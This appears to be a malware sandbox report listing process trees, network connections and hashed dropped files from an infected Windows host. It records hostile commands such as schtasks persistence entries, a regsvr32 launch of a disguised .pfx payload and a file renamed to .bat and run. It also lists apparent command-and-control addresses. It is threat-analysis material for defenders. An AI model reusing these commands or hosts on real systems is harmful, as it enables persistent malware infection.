C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\KDLWHZDLFRU\VRIGQP.exe

C:\Users\Admin\AppData\Local\Temp\KDLWHZDLFRU\VRIGQP.exe

C:\Users\Admin\AppData\Local\Temp\KDLWHZDLFRU\VRIGQP.exe

C:\Users\Admin\AppData\Local\Temp\WWNZLLUUMHS\KNWPIW.exe

C:\Users\Admin\AppData\Local\Temp\WWNZLLUUMHS\KNWPIW.exe 6424

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\WWNZLLUUMHS\KNWPIW.exe

C:\Users\Admin\AppData\Local\Temp\WWNZLLUUMHS\KNWPIW.exe

C:\Users\Admin\AppData\Local\Temp\WWNZLLUUMHS\KNWPIW.exe

C:\Users\Admin\AppData\Local\Temp\JKJPEFOXVPW\KDLUIL.exe

C:\Users\Admin\AppData\Local\Temp\JKJPEFOXVPW\KDLUIL.exe 2116

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\JKJPEFOXVPW\KDLUIL.exe

C:\Users\Admin\AppData\Local\Temp\JKJPEFOXVPW\KDLUIL.exe

C:\Users\Admin\AppData\Local\Temp\JKJPEFOXVPW\KDLUIL.exe

C:\Users\Admin\AppData\Local\Temp\OUGXTZRXNES\ZJPHKX.exe

C:\Users\Admin\AppData\Local\Temp\OUGXTZRXNES\ZJPHKX.exe 2772

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\OUGXTZRXNES\ZJPHKX.exe

C:\Users\Admin\AppData\Local\Temp\OUGXTZRXNES\ZJPHKX.exe

C:\Users\Admin\AppData\Local\Temp\OUGXTZRXNES\ZJPHKX.exe

C:\Users\Admin\AppData\Local\Temp\RKJTWKRZZSG\SOKEFM.exe

C:\Users\Admin\AppData\Local\Temp\RKJTWKRZZSG\SOKEFM.exe 7116

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\RKJTWKRZZSG\SOKEFM.exe

C:\Users\Admin\AppData\Local\Temp\RKJTWKRZZSG\SOKEFM.exe

C:\Users\Admin\AppData\Local\Temp\RKJTWKRZZSG\SOKEFM.exe

C:\Users\Admin\AppData\Local\Temp\UUWMFKEMVRT\RFIWYS.exe

C:\Users\Admin\AppData\Local\Temp\UUWMFKEMVRT\RFIWYS.exe 2832

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\UUWMFKEMVRT\RFIWYS.exe

C:\Users\Admin\AppData\Local\Temp\UUWMFKEMVRT\RFIWYS.exe

C:\Users\Admin\AppData\Local\Temp\UUWMFKEMVRT\RFIWYS.exe

C:\ProgramData\i58qqiwlxb.exe

"C:\ProgramData\i58qqiwlxb.exe"

C:\Users\Admin\AppData\Local\Temp\ISUDMFXKUWE\MYOKQE.exe

C:\Users\Admin\AppData\Local\Temp\ISUDMFXKUWE\MYOKQE.exe 2984

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\ISUDMFXKUWE\MYOKQE.exe

C:\Users\Admin\AppData\Local\Temp\ISUDMFXKUWE\MYOKQE.exe

C:\Users\Admin\AppData\Local\Temp\ISUDMFXKUWE\MYOKQE.exe

C:\Users\Admin\AppData\Local\Temp\YHFWOJTRRKH\WLQFRF.exe

C:\Users\Admin\AppData\Local\Temp\YHFWOJTRRKH\WLQFRF.exe 6500

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\YHFWOJTRRKH\WLQFRF.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Wave Browser" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Wave Google\Jackes.exe" /rl HIGHEST /f

C:\ProgramData\2vs2djekf3.exe

"C:\ProgramData\2vs2djekf3.exe"

C:\Users\Admin\AppData\Local\Temp\YHFWOJTRRKH\WLQFRF.exe

C:\Users\Admin\AppData\Local\Temp\YHFWOJTRRKH\WLQFRF.exe

C:\Users\Admin\AppData\Local\Temp\SLKMXKSJXXP\OHHKPD.exe

C:\Users\Admin\AppData\Local\Temp\SLKMXKSJXXP\OHHKPD.exe 4396

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\SLKMXKSJXXP\OHHKPD.exe

C:\Users\Admin\AppData\Roaming\Wave Google\Jackes.exe

"C:\Users\Admin\AppData\Roaming\Wave Google\Jackes.exe"

C:\Users\Admin\AppData\Local\Temp\10525150101\Bw5ZAOe.exe

"C:\Users\Admin\AppData\Local\Temp\10525150101\Bw5ZAOe.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Wave Browser" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Wave Google\Jackes.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\SLKMXKSJXXP\OHHKPD.exe

C:\Users\Admin\AppData\Local\Temp\SLKMXKSJXXP\OHHKPD.exe

C:\Users\Admin\AppData\Local\Temp\DZDPPQWHJDJ\ILJIWW.exe

C:\Users\Admin\AppData\Local\Temp\DZDPPQWHJDJ\ILJIWW.exe 4912

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\DZDPPQWHJDJ\ILJIWW.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\db1dj" & exit

C:\Users\Admin\AppData\Local\Temp\10525160101\Fv6kVbJ.exe

"C:\Users\Admin\AppData\Local\Temp\10525160101\Fv6kVbJ.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 1 /tn Server /tr C:\Users\Admin\AppData\Local\Temp/Server.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\ProgramData\2vs2djekf3.exe" ..

C:\Users\Admin\AppData\Local\Temp\DZDPPQWHJDJ\ILJIWW.exe

C:\Users\Admin\AppData\Local\Temp\DZDPPQWHJDJ\ILJIWW.exe

C:\Users\Admin\AppData\Local\Temp\LNQDQNLIUKU\DJEGQJ.exe

C:\Users\Admin\AppData\Local\Temp\LNQDQNLIUKU\DJEGQJ.exe 2220

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\LNQDQNLIUKU\DJEGQJ.exe

C:\Users\Admin\AppData\Local\Temp\10525160101\Fv6kVbJ.exe

"C:\Users\Admin\AppData\Local\Temp\10525160101\Fv6kVbJ.exe"

C:\Users\Admin\AppData\Local\Temp\10525180101\EG11t89.exe

"C:\Users\Admin\AppData\Local\Temp\10525180101\EG11t89.exe"

C:\Windows\system32\regsvr32.EXE

C:\Windows\system32\regsvr32.EXE /s /i:googlechromebusiness.msi "\\?\C:\Users\Admin\AppData\Local\3MediumVioletRed_4.pfx"

C:\ProgramData\2vs2djekf3.exe

C:\ProgramData\2vs2djekf3.exe ..

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c copy Survey.mpg Survey.mpg.bat & Survey.mpg.bat

C:\Windows\SysWOW64\timeout.exe

timeout /t 11

C:\Users\Admin\AppData\Local\Temp\LNQDQNLIUKU\DJEGQJ.exe

C:\Users\Admin\AppData\Local\Temp\LNQDQNLIUKU\DJEGQJ.exe

C:\Users\Admin\AppData\Local\Temp\NYKVNVUYYWZ\ZNFGML.exe

C:\Users\Admin\AppData\Local\Temp\NYKVNVUYYWZ\ZNFGML.exe 7784

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\NYKVNVUYYWZ\ZNFGML.exe

C:\Users\Admin\AppData\Local\Temp\10525330101\ku56mNL.exe

"C:\Users\Admin\AppData\Local\Temp\10525330101\ku56mNL.exe"

Network

Country Destination Domain Proto
UA 31.43.185.30:80 31.43.185.30 tcp
UA 185.156.72.2:80 185.156.72.2 tcp
TR 66.63.187.164:80 66.63.187.164 tcp
US 8.8.8.8:53 t.me udp
US 8.8.8.8:53 fdn.smart-server.us udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 ds.exifit.eu.org udp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
US 8.8.8.8:53 e5.c.lencr.org udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 104.18.20.213:80 e5.c.lencr.org tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
US 144.172.91.41:8805 tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.clients6.google.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.180.14:443 apis.google.com tcp
GB 142.250.129.95:443 ogads-pa.clients6.google.com tcp
GB 142.250.129.95:443 ogads-pa.clients6.google.com udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.200.46:443 clients2.google.com udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.200.1:443 clients2.googleusercontent.com udp
GB 142.250.179.238:443 play.google.com udp
N/A 224.0.0.251:5353 udp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
US 8.8.8.8:53 fdn.smart-server.us udp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
GB 142.250.200.46:443 clients2.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 142.250.200.1:443 clients2.googleusercontent.com tcp
GB 142.250.129.95:443 ogads-pa.clients6.google.com tcp
GB 142.250.180.14:443 apis.google.com tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
GB 142.250.129.95:443 ogads-pa.clients6.google.com udp
GB 142.250.129.95:443 ogads-pa.clients6.google.com tcp
US 8.8.8.8:53 ddf.mega-structure.pro udp
DK 2.58.46.178:39001 ddf.mega-structure.pro tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 comkxjs.xyz udp
US 144.172.115.212:443 comkxjs.xyz tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:80 edge.microsoft.com tcp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 204.79.197.203:443 ntp.msn.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 204.79.197.203:443 ntp.msn.com tcp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 clients2.google.com udp
US 204.79.197.203:443 ntp.msn.com tcp
GB 2.16.153.209:443 copilot.microsoft.com tcp
GB 142.250.200.46:443 clients2.google.com tcp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 assets.msn.com udp
GB 2.18.190.117:443 assets.msn.com tcp
GB 2.18.190.117:443 assets.msn.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 142.250.200.1:443 clients2.googleusercontent.com tcp
GB 2.18.190.117:443 assets.msn.com udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 2.18.190.117:443 assets.msn.com udp
US 8.8.8.8:53 c.msn.com udp
US 8.8.8.8:53 c.msn.com udp
US 8.8.8.8:53 c.bing.com udp
US 8.8.8.8:53 c.bing.com udp
GB 2.16.153.224:443 www.bing.com tcp
IE 13.74.129.1:443 c.msn.com tcp
US 150.171.28.10:443 c.bing.com tcp
GB 2.16.153.206:443 www.bing.com tcp
US 13.226.155.73:443 sb.scorecardresearch.com tcp
US 2.16.55.202:443 img-s-msn-com.akamaized.net tcp
US 144.172.115.212:443 comkxjs.xyz tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 204.79.197.203:443 ntp.msn.com tcp
US 150.171.27.11:80 edge.microsoft.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
GB 2.16.153.209:443 copilot.microsoft.com tcp
US 204.79.197.203:443 ntp.msn.com tcp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
GB 2.16.153.209:443 copilot.microsoft.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 204.79.197.203:443 ntp.msn.com tcp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 assets.msn.com udp
GB 2.18.190.117:443 assets.msn.com tcp
GB 2.18.190.117:443 assets.msn.com tcp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 2.18.190.117:443 assets.msn.com udp
US 8.8.8.8:53 c.msn.com udp
US 8.8.8.8:53 c.msn.com udp
US 8.8.8.8:53 c.bing.com udp
US 8.8.8.8:53 c.bing.com udp
US 150.171.28.10:443 c.bing.com tcp
GB 2.18.190.117:443 assets.msn.com udp
GB 2.16.153.198:443 www.bing.com tcp
IE 13.74.129.1:443 c.msn.com tcp
GB 2.16.153.206:443 www.bing.com tcp
US 13.226.155.20:443 sb.scorecardresearch.com tcp
US 2.16.55.202:443 img-s-msn-com.akamaized.net tcp
US 144.172.115.212:443 comkxjs.xyz tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 104.208.16.91:443 browser.events.data.msn.com tcp
US 104.208.16.91:443 browser.events.data.msn.com tcp
US 150.171.28.10:443 c.bing.com tcp
GB 2.18.190.117:443 assets.msn.com udp
US 2.16.55.202:443 img-s-msn-com.akamaized.net tcp
US 2.16.55.202:443 img-s-msn-com.akamaized.net tcp
US 2.16.55.202:443 img-s-msn-com.akamaized.net tcp
US 2.16.55.202:443 img-s-msn-com.akamaized.net tcp
US 2.16.55.202:443 img-s-msn-com.akamaized.net tcp
US 2.16.55.202:443 img-s-msn-com.akamaized.net tcp
GB 2.18.190.117:443 assets.msn.com udp
IE 13.74.129.1:443 c.msn.com tcp
US 8.8.8.8:53 srtb.msn.com udp
US 8.8.8.8:53 srtb.msn.com udp
US 204.79.197.203:443 srtb.msn.com tcp
US 2.16.55.202:443 img-s-msn-com.akamaized.net udp
US 204.79.197.203:443 srtb.msn.com tcp
GB 2.16.153.206:443 www.bing.com tcp
GB 2.16.153.206:443 www.bing.com tcp
GB 2.16.153.206:443 www.bing.com tcp
GB 2.16.153.206:443 www.bing.com tcp
GB 2.16.153.198:443 www.bing.com tcp
GB 2.16.153.198:443 www.bing.com tcp
GB 2.16.153.198:443 www.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.msftstatic.com udp
US 8.8.8.8:53 r.msftstatic.com udp
US 204.79.197.203:443 srtb.msn.com udp
US 204.79.197.219:443 r.msftstatic.com tcp
GB 2.16.153.222:443 r.bing.com tcp
GB 2.16.153.222:443 r.bing.com tcp
US 204.79.197.219:443 r.msftstatic.com tcp
US 204.79.197.203:443 srtb.msn.com tcp
US 8.8.8.8:53 bitbucket.org udp
GB 2.16.153.222:443 www.bing.com tcp
US 8.8.8.8:53 thaka.bing.com udp
US 8.8.8.8:53 thaka.bing.com udp
IE 185.166.142.22:443 bitbucket.org tcp
US 144.172.115.212:443 comkxjs.xyz tcp
RU 45.135.232.37:3333 tcp
US 144.172.91.41:8805 tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 update.googleapis.com udp
GB 142.250.187.227:443 update.googleapis.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 150.171.28.11:443 edge.microsoft.com tcp
GB 2.18.190.117:443 assets.msn.com udp
GB 2.18.190.117:443 assets.msn.com tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
RU 45.135.232.37:3333 tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp
RU 45.135.232.37:3333 tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
TR 66.63.187.164:80 66.63.187.164 tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
US 8.8.8.8:53 trsuv.xyz udp
US 144.172.115.212:443 trsuv.xyz tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
DE 116.203.167.110:443 ds.exifit.eu.org tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:8596 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
RU 45.135.232.37:3333 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
US 8.8.8.8:53 ipwho.is udp
US 144.172.115.212:443 trsuv.xyz tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
GB 57.128.140.217:443 ipwho.is tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:8595 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp
RU 45.135.232.37:3333 tcp
TR 66.63.187.164:1649 tcp
TR 66.63.187.164:1649 tcp

Files

C:\Temper\mSPVyMsH.exe

MD5 c0e2f8f76d9c00b423716fbefc4a9ac9
SHA1 e93b4b79a0daeb0013c8066c72ffeab8d61e43df
SHA256 3d0c40eb1260ee8a2ec0f5f9992a4cf992a07cf885b6c81a00efca2e3aa8092e
SHA512 a3d3cff75c0c78407ce5591f4b29266eb90d74d60d1e7012f457791da68c09855bfc3c7021f3e954dc58899b08b36329f1d0227507f569016eed1360832d8281

C:\Temper\pTLQnagR.exe

MD5 426ccb645e50a3143811cfa0e42e2ba6
SHA1 3c17e212a5fdf25847bc895460f55819bf48b11d
SHA256 cf878bfbd9ed93dc551ac038aff8a8bba4c935ddf8d48e62122bddfdb3e08567
SHA512 1ab13e8e6e0ca4ca2039f104d53a5286c4196e930319c4fe374fa3bf415214bb7c7d2a9d8ca677a29c911a356cca19a1cecae16dd4bf840bce725f20de4c8ff2

C:\Temper\BJwqsqOu.zip

MD5 6b38f7517b6deee67b95a811d64c5bda
SHA1 6a9a577f2c0323f9c046addc69aa45a372eae2c3
SHA256 3be2d892041a9396eb583860e7c5a0fc3d35b41d8fd2d3fe126b3bdc7dd69c96
SHA512 805f802c6c39a5f5bce18f422e7f5f17fe1853ab6ce61662f53f17cf59e1e5a91dbaaeffa5a60e9357034f9d540872c62bc1ccf16c1cd396a0c7d46456304c53

C:\Temper\pzoljWug.exe

MD5 7b8c43ff5287ec4c86921c06bff22ff0
SHA1 fb00fdb9cd78f260f5f26fc01aee6bb209d05877
SHA256 ed0b15b82c2dba6a4516c5a0f5268a95fd7fe8aead707272a096d8ef47db92c0
SHA512 dc914c0aa19df91665c5ad0020bfe87bcb7e97126446d4497b6ca8388f1e040796129c66effeeee78073d4f4f3e96d3446652c7510806bb6ac6cc652f4774784

C:\Temper\dHzrrTgp.exe

MD5 aba3831242815caa6b45baebc3ef81e7
SHA1 77da565e600bafe53e207b32583a4ab905e765e1
SHA256 9034ab3d9218b880220b0ca4b147e595fbee8c8bf69331de3fae65d1e2c8decb
SHA512 ae1296d70a8a14635d2c38df5b32e0aaed7c8187bd719c5c4d1c9a0dd087a3ab1dadd637732f03feb58422fa922746a534a03ed136cf687ae3ea9a3d26653c4c

C:\Users\Admin\AppData\Local\Temp\l5SkW3O.bat

MD5 f06b802a647d148b7104e382dc0b7ed8
SHA1 89f996877614a66ba7c22723474ea53b0e2fdf6f
SHA256 c4b0e7467d03ab117a70eb53478ad27f4e3795678519ebf352d1550a9cb12d1d
SHA512 da37ccb003e169b85117024d45cce61ecd25fab34fd79487b2933e5d7cddc3481c6184534a0bcd2d42c420d32384c3f75e422d5a92dfd4dce3dd4092306a0710

C:\Users\Admin\AppData\Local\Temp\Work\nircmd.exe

MD5 4a9da765fd91e80decfd2c9fe221e842
SHA1 6f763fbd2b37b2ce76a8e874b05a8075f48d1171
SHA256 2e81e048ab419fdc6e5f4336a951bd282ed6b740048dc38d7673678ee3490cda
SHA512 4716e598e4b930a0ec89f4d826afaa3dade22cf002111340bc253a618231e88f2f5247f918f993ed15b8ce0e3a97d6838c12b17616913e48334ee9b713c1957a

C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe

MD5 423129ddb24fb923f35b2dd5787b13dd
SHA1 575e57080f33fa87a8d37953e973d20f5ad80cfd
SHA256 5094ad359d8cf6dc5324598605c35f68519cc5af9c7ed5427e02a6b28121e4c7
SHA512 d3f904c944281e9be9788acea9cd31f563c5a764e927bcda7bae6bedcc6ae550c0809e49fd2cf00d9e143281d08522a4f484acc8d90b37111e2c737e91ae21ce

C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe

MD5 1413764323ab8677c10baf67b4ab3c18
SHA1 83f5468193b365a4cb03d33fc1343e9fc554ee2f
SHA256 49f68384539d1324a159d3b0ba1c4202c69d70d5c89849dc1f4fb690dafdaf03
SHA512 9a51fda2a4ece7c7119b6281a6e6c4e52c57c7e3931757ed1bd775d8820fb9ecd3953e72125a34e0bee30ccf50486124c7bfdb68290f93513305f2e678664d04

memory/3656-75-0x00000000004C0000-0x0000000000597000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-V0DA8.tmp\O1sOUoo.tmp

MD5 6e130d25c954298077ef8bf668bf38aa
SHA1 72717e8e4de383a242ee5ef57d3bd17b21cbbd84
SHA256 20a0484d93179e33336a97a6886a8e736dcfbe3830969c718b67f1e2e158d6a1
